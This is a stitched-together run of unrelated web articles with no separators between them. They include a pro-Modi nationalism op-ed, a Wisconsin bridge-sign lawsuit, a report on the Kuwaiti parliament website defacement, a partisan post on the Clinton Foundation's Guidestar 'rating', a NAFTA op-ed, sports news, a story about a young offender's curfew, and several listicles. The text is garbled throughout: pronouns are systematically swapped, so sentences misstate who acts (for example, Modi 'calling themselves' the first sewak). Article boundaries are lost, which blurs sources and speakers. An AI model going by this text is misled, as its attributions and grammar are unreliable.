One unexpected fallout of Prime Minister Narendra Modi's two years in office is the centre-staging of nationalism. Nationalism, after a long duration, is once again at the heart of both policy and discourse in India. The resurgence of nationalism, however, is a worldwide rather than uniquely Indian phenomenon.
The revival of nationalism came as a surprise to most experts. For decades, nationalism was not only considered passé, but almost became a bad word. Social and political theory confidently advanced post-nationalist models of the global order.
But they underestimated the resilience of nationalism. The largest free association of states in the post-World War era, the European Union, today appears breakable if not doomed. Not only has one of its largest members, Britain, decided to exit, but several other member-states no longer seem sure of its future. Moreover, the influx of not-too-welcome refugees has only led to the strengthening of national identities.
Indian nationalism, however, is not quite as negative or defensive. It is a positive, even assertive upsurge. Its central theme, tone, and tenor is the expectation that India can be great again. More than anyone else, it is Modi that has made Indians feel this way; they have restored the confidence of an entire civilization in its sense of manifest destiny. They have made India and Indians proud once more.
A renewed belief in India has also resulted in the reinvigoration of India's civilizational mission, which lay dormant, if not moribund, since independence. The millennial sense of special purpose and promise that fired the freedom movement went totally missing from the post-independence national imagination. That is what, a hundred years ago, gave Indians a sense of moral as well as spiritual ascendancy over their colonizers. But for long, this sense of India's special calling lay trampled and obscured.
But what is India's civilizational mission? This is a question that few pauses to ponder over. If we go by what philosopher Aurobindo Ghose said, then India rises for dharma, not for its own selfish interests.
To spell out the contents of such dharmic nationalism, we might argue that India's special gifts include non-dualism in the realm of metaphysics, swaraj or non-aggressive autonomy in the realm of politics, and non-exclusionism in the realm of culture.
Modi's two-pronged strategy to offer a corruption-free, efficient government within the country and to improve India's image overseas have contributed to such a dharmic nationalism. Robust economic growth and a more muscular foreign policy add to this sense of India's strength. Indians were tired of weak, wishy-washy, and indecisive leaders. Modi demonstrates strength and commitment. At their best, they can also be inspiring and visionary.
In the recent past, scam after brazen scam made us hang our heads in shame. The apathy and indifference of government, not just of selfish netas but of callous babus, made us feel alienated from the state. All the while, the ultra-rich found new ways of making even more money in India and stashing it away abroad. Rich or poor, no one felt a sense of belonging and ownership. There was an almost insurmountable trust deficit between the rulers and the ruled. In the face of severe odds, Modi has rehabilitated our idealism. Indians en masse have now become enthused with the possibility of India rising to new heights.
Now government means business; for the first time both ministers and bureaucrats seem to be accountable not just to their superiors but also to the people whom they are supposed to serve. Modi has led from the front by calling themselves India's first sewak or servant. Also, for the first time in decades, government does not seem to represent or favour a particular section of society. Modi's nationalism, thus, is the chant of the mantra of unity, not division. Modi has also spoken out against excesses of Hindutvawadis, including self-proclaimed vigilantes. This shows a much-needed corrective to hyper-nationalism.
A charge may be levelled that the whole thrust of this national upswing is Hindu. This must be acknowledged; it is Hindus at large, who are fired by the zeal to unite and reassert themselves in the world.
Like Indian, “Hindu" too is no longer a term of shame or abuse. Today, those who poke fun at Hindu symbols, Hindu ideas, and Hindu identity find themselves not only on the back foot but outflanked by vast numbers of detractors and critics the world over. The self-hating Hindu has gone out of fashion.
In the process, some of their admirers have gone to the extent of calling Modi the yuga purush, the epochal man. Modi may well be the yuga purush—or they may not. But if they get a second term, they will certainly change India in a lasting and significant way. This is the most important thing to bear in mind when trying to understand the phenomenon that is Modi.
What, then is the meaning of Modi? They no doubt means different things to different people; in that sense there are as many Modis as there are Indias, each Modus corresponding to a certain idea of India. But one thing is incontrovertible.
The idea of Narendara Modi is more important than Narendra Modi himself. Because it is this idea of Modi—at once larger, more powerful, and far-reaching in its appeal than the man—that can be the catalyst for change and the driver for the transformation of India.
Therein lies the sense and salience of “Namo" nationalism. It signifies not just the re-sacralization of the nation, but Modi's own special contribution to both the discourse and practice of nationalism.
Makarand R. Paranjape is a professor at Jawaharlal Nehru University.
Comments are welcome at theirview@livemint.com
People protest last year on a pedestrian bridge over I-90 in Campbell. Credit: Photo courtesy of Thomas More Law Center
By of the
While technology continues to incubate new issues related to the First Amendment, some very traditional means of protest have landed a small Wisconsin town in a federal court civil rights case.
Two La Crosse men have sued the Town of Campbell over its 2013 ordinance banning signs and other displays from a pedestrian bridge over Interstate 90, and from an area 100 feet around the bridge.
The plaintiffs contend that the bridge is like a sidewalk, a traditional public forum, and that town officials tried to ban signs only after tea party activists hung banners urging passing motorists to impeach President Barack Obama.
According to their lawsuit, filed late last month in federal court in Madison, Greg Luce and Nicholas Newman had been demonstrating along the pedestrian bridge in the La Crosse County town from August to October without incident, or any traffic accidents attributable to their display of messages.
In early October, the town passed an ordinance banning signs, flags, banners and such from the bridge, citing safety concerns. The plaintiffs contend the ban was in response to local news media coverage of the impeachment message.
So on Oct. 24, Luce and fellow demonstrators came to the bridge wearing T-shirts that spelled out IMPEACH on one side, and OBAMA on the other. They were told by Campbell police to leave the overpass, and they did.
On Oct. 27, Newman stood on the overpass with an American flag "to express their pride for their country and the ideals on which it was founded" when they were ticketed for violating the new ordinance, the suit states.
Four more protesters were ticketed during a December demonstration, the La Crosse Tribune reported, some for holding flags and one for holding a cross.
Luce and Newman later wrote to town officials explaining their position that the ordinance was unlawful but got no response, their suit contends. Now, they seek an injunction blocking enforcement of the ordinance.
Brent Smith, a La Crosse attorney who represents the town, said Tuesday that while they knew of no accidents related to message on the bridge, the point of the ban was to prevent accidents.
They also insisted the ordinance was not aimed at any particular message.
"I can say in the lead-up to the passage, and from knowing the town board members, that there was nothing to indicate it has anything to do with the message," Smith said. "It's content neutral."
Smith said a similar restriction was adopted in Madison several years ago that was subjected to a similar challenge but upheld by a federal appellate court.
Luce and Newman are represented by the Michigan-based Thomas More Law Center, which, according to a news release, "defends and promotes America's Judeo-Christian heritage and moral values."
Their local attorney, Bernardo Cueto, said about 25,000 drivers a day go under the pedestrian bridge, and there's no other venue in the La Crosse area that offers the same exposure for people exercising the First Amendment expressions.
The 100 Hottest Cosplay Girls is a list we had a hard time putting together. There are so many fantastic cosplayers, how do we pick the top 100? Using the latest in scientific data, which included charts, surveys, polls, algorithms and how many times we drooled over a particular costume, we came up with this definitive list of the 100 Hottest Cosplay Girls.
Know that feeling you get when you see a really hot video game character but then lament the fact that she's not real? Well, thank your lucky stars that cosplay was invented! Since the birth of fandom, people have been perfecting the art of dressing up like their favorite characters.
These intrepid fans are called cosplayers and can usually be found wearing some of the most outlandish, intricate, and amazing costumes based on existing characters that you've ever seen. Thankfully, a lot of these cosplayers happen to be really attractive, and we've rounded up some of the hottest cosplayers around who have donned the outfits of a few of our favorite video game characters.
This may be a countdown, but you ladies are all #1 in our hearts. Without further ado, here are the 100 Hottest Cosplay Girls.
Deshorn Brown poses with Lionel Messi after a 2015 Copa America match between Jamaica and Argentina. (Luis Acosta/AFP-Getty Images)
Goal-starved D.C. United acquired Jamaican forward Deshorn Brown from the the second-division Tampa Bay Rowdies on Tuesday.
Brown, 26, scored 10 goals for the Colorado Rapids in both 2013 and 2014 before playing one year for Norwegian club Valerenga and one for Chinese side Shenzhen. They joined the Rowdies this year, posting three goals in 14 appearances (eight starts).
They arrived in Washington on Monday, trained with the team Tuesday and is eligible to play Wednesday against Atlanta United at RFK Stadium, Coach Ben Olsen said. The MLS transfer window doesn't open until July 10, but because Brown was playing domestically and registered with the U.S. Soccer Federation, they can play right away.
United paid an undisclosed transfer fee.
Because they left MLS on a transfer two years ago, Brown was subjected to the league's allocation list. United acquired the top pick from Houston for the No. 9 slot, $100,000 in general allocation money, $75,000 in targeted allocation money and a 2018 international roster spot. By exercising the No. 1 position, United moved to the bottom of the list.
D.C. (4-8-3) has been actively seeking help in the attack after scoring an MLS-worst 10 goals in the first 15 matches and suffering 10 scoreless performances.
Reserve forward Alhaji Kamara is in the process of being sold overseas and part-time starter Jose Guillermo Ortiz (one goal) has fallen short of expectations. First-choice striker Patrick Mullins is recovering from knee surgery. Other frontline choices have not solved United's problems.
Brown, known for blinding speed, was Colorado's first-round draft pick in 2013 (sixth overall) and proceeded to lead the team in scoring, one goal short of what was then the MLS rookie record for goals (11). They were second in rookie of the year voting. Brown repeated their regular season scoring feats in 2014 and posted a hat trick in a U.S. Open Cup match.
In March 2015, the Rapids sold them to Valerenga for more than $500,000. They later moved to China for $1 million. In two years overseas, they recorded 24 goals in 54 matches across all competitions.
With the Rowdies, Brown has been used as a substitute the past four USL matches.
“I know what he's about,” Olsen said. “I'm not too concerned about their situation in Tampa. It was obviously a stopover until their next step. I'm sure he'll see minutes very soon.”
A group of hackers going by the handle of “Group_Dmar” hacked and defaced the official website of Kuwaiti Parliament on Saturday when the country was gearing up for its parliamentary election.
Hackers left a deface page along with a brief message in Arabic accusing Mr. Abdul Hamid Dashti, a member of parliament of being an Iranian agent and that other MPs should unite against him. Hackers also vowed to leak conversation between Mr. Dashti, Iranian and Syrian government.
Also Read: Kuwait Automotive Imports Company Hacked; 10k Accounts Leaked
Mr. Dashti who belongs to Shia sect of Islam was previously criticized for their meeting with the family of late Hizballah commander Mr. Imad Mughniyah. In 2015, Saudi government asked Kuwait to prosecute Mr. Dashti for “repeated insults to Saudi Arabia in the media.”
In the other part of their message hackers demanded the government of Kuwait to provide citizenship and other rights to stateless residents of Kuwaitis often known as Bidoon (Click here to read who are Bidoons).
عاجل| إختراق موقع مجلس الأمة الكويتي (قسم الوظائف) واتهام المجلس أنه بقيادة إيران والتهديد بنشر وثائق! https://t.co/TONAOt9f2c
ولايزال مخترق pic.twitter.com/Hgihuf4OZR — عبدالله العلي (@CyberkovCEO) November 26, 2016
It is unclear how hackers were able to deface the parliament website, however, the defacement message indicates the tough relationship between of Shia and Sunni sects.
This is not the first time when a high-profile Kuwaiti website was hacked on an important day. In 2012, online hacktivist group Anonymous had hacked the official website of Diwan of the Kuwaiti Crown Prince just one day before Christmas with messages in support of hackers arrested for hacktivism.
[fullsquaread][/fullsquaread]
Also Read: Kuwait Ministry of Internal Affairs Hacked, Hacker Demands Interference in Syria
At the time of publishing this article, Kuwaiti parliament website was offline.
CNN and the Clinton Foundation — partners in fake news Nathan Hulick Blocked Unblock Follow Jul 5, 2017 The Hillary Clinton campaign, the Clinton Foundation, CNN, and Media Matters have been falsely claiming that the Clinton Foundation received a “platinum rating” from Guidestar, a nonprofit “information service” which reports on other US nonprofits. Here is the problem, Guidestar does not give ratings, they are not a watchdog nor a ratings agency. They merely post the data they are provided by nonprofits without verifying any of it. Some background information on Guidestar. Their about us page claims that: Many people think that we are a charity evaluator or a watchdog. We aren't. Instead, we are a 501(c)(3) public charity that collects, organizes, and presents the information you want in an easy-to-understand format while remaining neutral. In an email with Jacob Harold, the CEO of Guidestar, they stated , “We do not endorse candidates or political parties. GuideStar is a neutral data platform. We do not consider ourselves a watchdog or a ratings agency. “ Guidestar has, however, created the “Platinum Seal” program, which allows a nonprofit to submit any metric they like, whether they choose one of the 700 metrics already listed or can simply make up their own custom metric. Guidestar's description of the Platinum program states that: Some of these metrics are as simple as “number of donors” or “number of first time donors”. However, an organization is also free to make up their own metric, such as “number of Jedi Knights saved from death at the hands of Darth Vader” or “number of Sasquatches fed, clothed and returned to the wild unharmed”. None of this is checked for accuracy or monitored by Guidestar according to their website, and the organization refused to return numerous emails questioning this program or their policies concerning nonprofits falsely claiming that Guidestar had awarded them a platinum rating. In other words Guidestar's “platinum seal” has set the bar so low it's buried in the ground and any organization that bothers to set up an account on their website and enter in a few “metrics” can be sure not to trip over it. The Clinton Foundation, in their neverending quest to promote the Clintons as humanitarians by any means necessary, seems to have made a concerted effort to misrepresent this platinum seal as a platinum rating. Hillary Clinton's official campaign website repeated the same false claim that Guidestar has given this organization a “platinum rating” as well.
Next we have Donna Shalala, CEO of the Clinton Foundation spreading this false claim that GuideStar has given the foundation a Platinum rating, and has lauded the foundation for its “commitment to transparency” in an opinion piece posted on USA Today. In addition to being the CEO of the Clinton Foundation, Shalala also a member of the board of directors of Gannett, the company that owns USA Today. This exact same talking point ”lauded the foundation for its commitment to transparency” has been used by Clinton Foundation Chief Communications Officer (and Clinton campaign consultant) Craig Minassian on Medium as well as the Clinton Foundation's official website!
One week later, we have a public statement from President Donna Shalala on Sept 1, 2016: Here is the text of that statement: “Today, we heard yet again from highly-respected experts that the Clinton Foundation ranks among the most effective and well-regarded charitable organizations in the world. We are proud to be rated four stars by Charity Navigator for the strength of our operations and transparency. Having also received an ‘A' rating from American Institute of Philanthropy's CharityWatch; and the highest Platinum rating from Guidestar, Charity Navigator's four-star rating is another clear indication of our ongoing commitment to driving transparency and accountability while improving the lives of millions of people here in the U.S. and all around the world.” The next day, Sept 2, 2016, Shalala posted this false claim again on the Clinton Foundation's blog repeating the “platinum rating” claim. Here's the Clinton Foundation's Twitter account spreading this misleading statement to their 737,000 followers. https://archive.is/yLBlK Here it is again on their website, listed as “the facts”!
Even as renegotiation of the North American Free Trade Agreement just got underway, President Trump continues to hint they may prefer to tear up the 23-year old agreement, complaining on Twitter that trading partners Canada and Mexico are "being very difficult."
From the American side of the table, the focus is on the agreement's impact on U.S. labor markets and workers. Indeed, there is wide scope to modernize and improve NAFTA to benefit of American businesses, workers and consumers. Alas, protectionist efforts to reduce America's trade deficits and to restrict cross-border flows will harm the very people that trade skeptics claim to want to help. Such concerns, highlighted by the Trump administration's Office of the U.S. Trade Representative, stem from the faulty assumption that importing more goods from Canada and Mexico than we export to them has harmed American workers.
Yet American workers have not been harmed notably under the agreement. In fact, according to economists John Francis and Yuqing Zheng, since it was implemented in 1994, NAFTA has reduced the annual growth of unemployment in the United States by more than 4.4 percent, with only small effects on the real wages of American workers. Moreover, virtually all economists agree that the trade deficit is driven by macroeconomic factors such as the rate of American savings and the value of the U.S. dollar, not trade policy.
ADVERTISEMENT
A 2014 study by the U.S. International Trade Commission reviewed the economic literature on the impact of NAFTA on the American labor market, finding that it had little to no effect on aggregate labor-market outcomes in the United States. Compared to the broader effects of globalization and technological change, NAFTA has had only a very modest impact on American labor markets over the past 23 years.
NAFTA did produce adjustment costs to the American labor market, as witnessed by the movement of some manufacturing jobs from the United States to Mexico in the years immediately following the agreement's ratification. However, expanded American exports to Mexico and Canada also have helped U.S. manufacturing. About 8,500 manufacturing jobs are produced for every $1 billion in added exports from trade liberalization.
Furthermore, it is likely that many of the manufacturing jobs moved to Mexico would have been offshored to lower-cost competition in Asia, as this trend began in earnest with the 1979 economic reforms in China. Instead, those jobs were incorporated back into the American economy indirectly through regional supply chains that benefit Americans directly.
Attempts by USTR to reduce America's bilateral trade deficits with Mexico and Canada are likely to harm American workers. The robust supply chains that were developed in North America as a result of the agreement created significant American value-additions within Mexican and Canadian imports. About 40 percent of the value added in a typical Mexican product originates in the United States. Because of these interconnected supply chains, any attempt to squeeze Mexican imports would have the side effect of harming American firms and reducing American labor demand.
This is not to say that NAFTA is perfect or could not stand to be modernized. The agreement lacks provisions to protect and foster trade in digital goods, which are far more important to the U.S. economy now than they were in 1994. A legal framework that lowers barriers to digital trade would be particularly helpful for American workers, many of whom operate as independent contractors or within small business on digital platforms.
Similarly, increasing the de minimis threshold — which exempts imported items below a certain value from taxes, duties and most customs paperwork — would reduce collection costs for all three countries, while facilitating greater cross-border flows. The United States has an $800 de minimis threshold; Canada, by contrast, has a C$20 threshold — the lowest in the industrialized world. Raising the threshold would especially benefit consumers and workers in border regions, who disproportionately gain from enhanced trade between their home and neighboring countries.
Any discussion about the net winners and losers of NAFTA should also include a broader commitment toward policies that help America's labor force become more dynamic and flexible, which would improve workers' ability to adjust to the impacts of trade liberalization. Policymakers should identify ways to enhance the prospects of negatively affected workers through such policies as mobility grants, portable social-welfare benefits and privately supported worker retraining programs. These could go a long way toward smoothing the adjustment process for the losers of increased free trade.
America should build on NAFTA's strengths while enhancing the U.S. labor force to better adjust for trade-related disruptions. Together, those two policies would be a much more effective strategy to improve American workers' prospects than protectionist policies ever could be.
Garrett Watson (@GS_Watson) is a project manager for the R Street Institute. Clark Packard (@Clark_Packard) is an outreach manager and trade analyst for the R Street Institute.
The views expressed by contributors are their own and are not the views of The Hill.
Munster sealed a quarter-final place in Europe's elite tournament for the 16th time in 22 seasons with victory in Scotland
Munster will be investigated over their management of Conor Murray's head injury in the European Champions Cup victory over Glasgow on Saturday.
Scrum-half Murray took a heavy blow to the head in a tackle but was allowed to return to the field after belatedly being sent for an assessment.
However, Munster say Murray showed no signs of concussion.
Recently, Northampton were found to have breached rules by allowing George North to play on after a head injury.
Sale are currently being investigated for an incident involving TJ Ioane.
European Cup organisers confirmed to BBC Sport that an Untoward Incident Review Group will convene early this week to decide whether Munster had broken concussion management protocols.
Munster insist Murray was assessed at the time of the incident and did not appear to be concussed.
The club said upon further review of the footage by Munster medics, they were removed for a head-injury assessment as a precaution. They passed that and returned to the field of play and subsequently passed a second head-injury assessment after the match.
The 14-12 victory over Glasgow means Munster are now guaranteed to top Pool One, sealing a quarter-final place in Europe's elite tournament for the 16th time in 22 seasons.
This is the true story of a day in the life of a 17-year-old boy, Shaun, who worked for me briefly before they got into a drunken, violent fight and was sent to jail. Their background is one of poverty, chaos and lovelessness.
On the day of their release, they are luckier than most: they have somewhere to go - their girlfriend's bedsit. But Shaun comes complete with tagging machine. They wear a grey tag on their leg and they have a 6pm curfew. Every evening, the machine and tag must renew their acquaintance or Shaun will be sent straight back to jail.
Three days after their release, Shaun and their girlfriend have an argument. They chuck them out at 10am. Now the clock has started ticking because they have to be installed somewhere suitable - a friend's sofa will not do - before curfew. Shaun grabs a newspaper to look through the accommodation ads on their way to their probation officer, who needs to approve the move and must urgently arrange for the tagging machine to be installed in Shaun's new accommodation.
At 11am, Shaun is told that the officer is out. But their journey hasn't been wasted - someone agrees to read the small ads to him, because Shaun can't read. They even let them use the phone as they don't have a phone of their own.
It's now noon, and Shaun is still frantically phoning landlords. He's an ex-offender on a tag and most people don't want that kind of tenant, but at 12.30 Shaun finds a bedsit. The landlord is well-known for their low rents and high bacteria count, but Shaun just needs an address by tonight. The landlord wants to meet them at the bedsit. They jump on a bus and crosses town. The bedsit is not attractive. In fact, only a desperate man would take it. Shaun is a kid, not a man - but they are desperate. They agree to organise references and return shortly with two weeks' rent and the deposit.
They need rent, deposit and the right housing forms from the benefits office for their new landlord to sign. It's 1.30 and there's a queue. Shaun bites their nails until it's their turn. A woman says sorry, they need 24 hours' notice to give them the deposit.
At 2pm, Shaun phones me. I am out of town, but I arrange for a mate who owes me money to hand over all the cash they have, which will cover the deposit. Shaun asks the benefits office for a crisis loan for the two weeks' rent. They tell them to come back after 3pm. I phone through a reference to their landlord, while Shaun dashes off to meet my mate, and by now they have no money left for the bus so they run. He's running against the clock.
Their landlord takes the deposit and signs the forms. Now it's 4pm, so their probation officer must be back. Shaun rushes across town and breathlessly explains what has happened. The probation officer has a heavy caseload and is not happy, but they agree to endorse Shaun's new address and rings the landlord with the necessary second reference. They contact the tagging team and asks them to install the machine at the bedsit before six o'clock.
Shaun just makes it back to benefits with the signed forms before they close. And, yes, they've got two weeks' rent for him. If they can give this to their landlord and get back to their new home by 6pm, and if the tagging machine is in place, Shaun will be able to stay there. With not a moment to lose, they make a last superhuman effort, running all the way.
It is 5.45. Shaun staggers through the door. The tagging machine is there and so is Shaun. He's done it! Except they haven't. The machine runs on electricity and the meter's empty. Shaun needs a £1 coin. And they don't have one.
Shaun is just a kid. They sit down and cries, and then they ring me and cries some more. I arrange for someone to cross town to deliver some coins. But it is too late. By the time my mate arrives, Shaun is deemed to have broken their curfew, so it's back to jail.
Most kids their age have spent the day in college, where they probably achieved little compared to what Shaun has. While they face career choices, Shaun today learned that, for him, change is obstructed and their choices are few. No matter how hard they try.
• Mark Johnson, a rehabilitated offender and former drug user, now runs a charity that aims to reduce reoffending.
'Last Kiss,' the '60s Tearjerker, From Wayne Cochran to Pearl Jam
Eddie Vedder of Pearl Jam performs on the main stage as the band headline day 3 of The Isle of Wight Festival at Seaclose Park on June 23, 2012 in Newport, Isle of Wight. (Photo : Samir Hussein/Getty Images)
"Last Kiss," a teen death ballad from the early 1960s by Wayne Cochran, had attained unlikely longevity by the end of the 20th century. A dud on initial release, the ditty was picked up by various '60s and '70s pop vocal groups before its serendipitous revival by '90s grunge icons Pearl Jam.
The song tells the tale of teenage lovers entangled in a car crash, the narrator scarcely surviving and recounting the final moments of their sweetheart's life. R&B crooner Cochran penned the tune in that era's style of popular "splatter platters," recording the first of their four versions in 1961.
As Cochran told MTV News in 1999, the song's origins were inspired by a perilous span of rural highway near their then-home of Thomaston, Georgia:
"There were two or three accidents a year there and people were always getting killed," they said. "It was horrible. ... So I said, 'I'm gonna write a song about a car wreck.'"
Cochran's mournful melody failed to chart, gaining only regional recognition. Conjecture and folklore challenge the number's true origins -- plausible rumors suggest the balladeer's bandmates had a hand in the arrangement; outlandish theories posit the composition's outright theft. Comparison reveals its opening lines as adapted from 19th-century songwriter Septimus Winner's "Der Deitcher's Dog."
"Last Kiss" earned its first national success with a 1964 rendition by J. Frank Wilson and the Cavaliers. Reaching No. 2 on the Billboard Hot 100 chart, the song launched the band commercially and became the title track of their debut album. A decade later, Canadian vocal group Wednesday (also known as Wenzday) again made the song a hit, their 1974 version peaking on the Hot 100 at No. 34.
Pearl Jam singer Eddie Vedder stumbled over an old 45 of the song at Seattle's Fremont Vintage Mall. Enthralled by the tragic tune, they introduced it to the band. Bassist Jeff Ament recalled its recording to the Seattle Post-Intelligencer, the quintet swiftly hashing out a no-frills cover take at a 1998 soundcheck:
"It was the most minimalist recording we've ever done," Ament said of "Last Kiss." "Ed played us the song and we played along with it a couple of times backstage during the last tour. And then one night we went out and played it in front of a crowd for the first time." [...] "The third time we played it live at a soundcheck in Washington, D.C., and that's what you hear on the record."
Intended as a limited single for the band's fan club, the Pearl Jam adaptation leaked to radio in 1999 and rocketed to No. 2 on the Hot 100 and No. 4 on the Top 40. Due to the unexpected demand, the band released a commercial single version that June, donating all profits to Kosovo War refugees.
The song remains Pearl Jam's highest charting hit and their most implausibly popular single. Guitarist Stone Gossard spoke of the song's acclaim to the Boston Globe, discussing its surprise fame:
"It's very interesting. We recorded that at a soundcheck on a little digital recorder. It was for the fan club. You can try album after album to write a hit and spend months getting drum sounds and rewriting lyrics, or you can go to a used record store and pick out a single and fall in love with it."
We want to hear from you. Let us know your favorite recording of "Last Kiss" in the comments section below.
© 2016 The Classical Art, All rights reserved. Do not reproduce without permission.
TagsLast Kiss, Pearl Jam, Wayne Cochran, J. Frank Wilson and the Cavaliers
The Philadelphia Eagles have outscored opponents 74-24 in the second half of their three games this season.
One of the theories bandied about for that advantage is that coach Chip Kelly's rigorous, fast-paced practices have their troops hitting their stride later in the game while the other team is sucking wind.
Jabbering cornerback Cary Williams takes the opposite viewpoint, complaining after Sunday's 37-34 victory that Kelly's up-tempo practices are to blame for the Eagles' slow starts this season.
"It's hard to go out there and fight for 60 minutes when you're fighting throughout the week to make it through one practice," Williams said, via ESPN.com. "I'm not the only one. I'm just the only one that's man enough to stand up here and talk to y'all. It's obviously, in my opinion, an issue in our starts."
The Eagles actually held a lead at halftime Sunday for the first time this season, but only after falling behind 17-7.
"We've got to start taking care of our guys, taking care of our players," Williams continued. "A lot of guys coming in here had no legs. We've got to start taking care of our guys throughout the week in order for us to be productive and have more energy on Sundays. You've got to be smart, as a coaching staff and as players."
Williams went on to emphasize that the arduous practices are "not conducive to success."
When asked Monday about the cornerback's comments, Kelly noted Williams had visited their office to chat.
"I met with Cary just a little while ago -- they came in on their own today -- to visit with them and I think they were frustrated," Kelly told the media. "And I understand that. Cary's a competitor and I have no issues with Cary."
But did Kelly wish that Williams came to them first instead of the media?
"No, you guys are everywhere," they quipped. "Really, nothing. So that's the world we live with."
"I told them they could come talk to me," they added after a follow-up question. "But I think they know that; I think they also understand that in some places you can't go talk to the coach. And my door is always open, anybody can come talk to me."
The Eagles are alone in first place at 3-0 after winning the NFC East in Kelly's Philadelphia debut last year. Unless a host of players joins Williams in running off at the mouth, we'll defer to Kelly on the recipe for their team's success.
The latest Around The NFL Podcast recaps all of the Week 3 action and picks the top team in the AFC.
Many people asked us to do more HDR video after the surprisingly positive reception of our Forza 7 ones a few days ago. Needless we don't have any more HDR footage from upcoming games, but we have a lot of amazing looking PS4 Pro title to show off. I don't think many people will be surprised by the fact that we start with the still incredibly amazing looking Horizon: Zero Dawn, and these two videos showing a sunset, and a very high contract Cauldron sequence (slight spoilers in that one).
Update 6: After inFamous: Second Son, Uncharted 4: A Thief's End, Ratchet & Clank, WipEout Omega Collection, The Last of Us, Tom Clancy's Ghost Recon: Wildlands and now a third video of Deus Ex: Mankind Divided.
As usual now, these videos will only work as they should on a HDR screen. Simply copy the file(s) to a USB media and plug it into your TV or Xbox One S. You can also use a Chromecast Ultra or a Samsung TV to watch the video on our Youtube channel, but the quality won't be as good.
It's also important to mention that these videos are still very much experimental for us, and we are still learning and changing the way we encode them, so expect us to fail too!
The Brook Waimarama Sanctuary is carrying out a poison drop to kill predators before native birds are reintroduced.
The Brook Valley Community Group has failed in its last-ditch legal challenge to halt a poison drop at the Brook Waimarama Sanctuary.
The Court of Appeal on Thursday ruled against the group's bid for a stay of proceedings against the brodifacoum drop to wipe out predators and pests in the 711-hectare sanctuary.
The drop is now poised to proceed in the next favourable stretch of weather.
Environment Minister and Nelson MP Nick Smith said the appeal decision meant it was time the community group stopped its disruption to the sanctuary project.
Its opposition had become "farcical", they said.
Smith said they had spent a weekend door knocking in the Brook Valley and was amazed at the strength of support for the sanctuary.
They said the community group was not representative of the community, and its strongest support came from anti-1080 campaigners elsewhere.
Sanctuary trust board member Derek Shaw said it was time to end the court battles.
"The debate has taken place and is now over," Shaw said.
"Our intent is to conduct a safe, thoroughly planned and reviewed, and well-implemented pest removal operation that many other sanctuaries around New Zealand have done to great success.
"Let's move on and lay the ground work for a transformational ecological restoration project that will see the Nelson region teeming with native birds and rare wildlife that will inspire locals and visitors to Nelson for generations to come."
The court judgment, delivered by Justice Asher, said while the community group had raised genuine issues to be argued on appeal, other issues tipped the balance against it.
The group's failure to provide an undertaking related to damages to the Brook sanctuary trust if the group ultimately lost its main appeal against the drop was a "significant factor".
The group argued it did not have the means to make such undertaking. But the court noted some of its members were landowners and it was not satisfied that a meaningful undertaking could not be provided.
Justice Asher said evidence provided showed a year's delay in the planned winter drop would have direct costs to the sanctuary trust of $127,000, and would delay its development, and potentially damage support for the project.
The sanctuary trust was also entitled to the fruits of the High Court decision against the community group's arguments. Rejecting its bid for a stay of proceedings did not mean the group could not proceed with its appeal over laws controlling poison drops.
The community group lawyer, Sue Grey, said the decision was disappointing though the group was heartened by the recognition it had an arguable case.
They said it would be "extremely disappointing if the drop went ahead when there's so much doubt about the law."
The group has argued that national regulations allowing the brodifacoum operation were invalid and the drop contravened a section of the Resource Management Act. However, the High Court found the section cited by the group did not relate to contaminants such as brodifacoum. They were covered in another section and subsequently by regulations.
Buy The Evil Within as a Steam Key.
Developed by Shinji Mikami -- creator of the seminal Resident Evil series -- and the talented team at Tango Gameworks, The Evil Within embodies the meaning of pure survival horror. Experience a disturbing reality as you try to break free from warped machinations that could only exist in the most horrifying worlds. Face twisted creatures and experience true terror, all heightened by cutting edge lighting and animation made possible by a customized version of the id Tech 5 engine.
While investigating the scene of a gruesome mass murder, Detective Sebastian Castellanos and their partners encounter a mysterious and powerful force. After seeing the slaughter of fellow officers, Sebastian is ambushed and knocked unconscious. When they awaken, they find themselves in a deranged world where hideous creatures wander among the dead. Facing unimaginable terror, and fighting for survival, Sebastian embarks on a frightening journey to unravel what's behind this evil force.
Features The Evil Within
Democratic candidate Jon Ossoff lost the Georgia special election Tuesday despite the fact that their campaign received unprecedented funding from the deeply liberal state of California.
The young Democrat received 8.9 times as many many donors from California than from any other state in the union, including all of the totals from Georgia itself.
The failed Democrat received 7,218 private donations from California residents. They benefitted from only 808 donations from inside of Georgia's sixth congressional district.
Hollywood insiders like Chelsea Handler and Georgia Takei donated to Ossoff's campaign, and other celebrities like Jane Fonda, Sam Waterston, and Kyra Sedgwick all donated their time towards the campaign.
The Georgia politician lost the election earlier than expected Tuesday evening. They earned 48 percent compared to former Georgia Secretary of State Karen Handel's 52 percent showing in the race.
Former Democratic Candidate Hillary Clinton had overwhelming support from liberals in California. They earned $132,137,278 during the election against Trump, a full 22.49 percent of their campaign's total fundraising haul. The presidential candidate ended up earning and spending nearly $1.2 billion in their fight against Trump.
Perhaps not surprisingly, $49,224,731 came from residents of the Los Angeles area.
WATCH HANDEL SHATTER THE GLASS CEILING:
Follow Phillip On Twitter
Have a Tip? Let us Know
Content created by The Daily Caller News Foundation is available without charge to any eligible news publisher that can provide a large audience. For licensing opportunities of our original content, please contact licensing@dailycallernewsfoundation.org.
Joining my college a cappella group was the best and worst decision of my life. On the plus side, I found myself surrounded by an amazing group of girls who I created strong and lasting bonds with. On the downside, I kind of fell into a cult.
In this situation, I was basically like the movie “Pitch Perfect,” minus the vomiting and me being a sick nasty DJ. I was never a girls-girl, and suddenly I found myself in an all-female group. We're even called the Bellas.
The more I look at the signs, the more I realize that a cappella life is like a really fun and not scary cult, in a way. We get really really obsessed with things that normal and sane people wouldn't care about. We spend hours at night locked in tiny rooms repeating things over and over. And once you're in, you're in for life. No one gets out of a cappella alive.
[divider] [/divider]
SIGNS YOU MIGHT BE IN AN A CAPPELLA CULT:
1. You have at one point in your life put aca- in front of an ordinary word.
2. You have literally wasted hours of your life on the endless pit of a cappella covers that YouTube has to provide.
3. There was a moment where you swore you'd never be doing stupid dance moves on stage, and then you find yourself willingly doing dance moves that are actually 10 times more embarrassing than your worst nightmares.
4. You get uncomfortably excited when the touring male a cappella group makes a stop at your college… even if you're a dude. What? Men's a cappella groups are great, you guys.
5. Finding a cappella people from other schools is like finding gold at the end of a rainbow. You feel the need to beatbox and harmonize at all times.
6. It is actually impossible to take a car trip with fellow aca-cult members without attempting to harmonize to whatever is on the radio. But your impromptu “Party in the USA” arrangement will never live up to the one in “Pitch Perfect.”
7. At one point in your life you have tried to beatbox and spit all over yourself. People have probably been there to watch.
8. You and the people in your a cappella group are too close. Somewhere along the line, all boundaries went out the window and it's just one big TMI love fest.
